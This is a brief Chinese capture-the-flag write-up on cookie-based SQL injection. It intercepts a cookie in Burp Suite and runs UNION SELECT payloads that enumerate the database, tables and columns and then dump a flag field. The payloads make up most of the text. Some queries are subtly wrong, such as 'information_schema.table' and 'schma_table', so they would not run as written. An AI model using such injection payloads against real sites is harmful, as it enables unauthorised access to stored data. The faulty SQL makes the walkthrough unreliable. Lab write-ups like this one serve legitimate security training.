** Cookie注入**
- 根据提示寻找Cookie,对其进行bp抓包,并发包到repeater
对cookie进行注入判断
-1 union select 1,2
- 在注入后回显并显示内容,判断为Cookie注入,按照正常的注入流程获取flag
-1 union select database(),1 查库名
- 然后查询数据库的表名
-1 union select 1,group_concat(table_name) from information_schema.table where table_schema=‘sqli’
表名分别为 news 和 kdekdoxcuj - 然后查询kdekdoxcuj的列名
-1 union select 1,group_concat(column_name) from information_schema.columns where schma_table=‘sqli’ and table_name=‘kdekdoxcuj’
- 查询该库该表该列的所有字段
-1 union select 1,group_concat(mkpojtslyb) from kdekdoxcuj
得出flag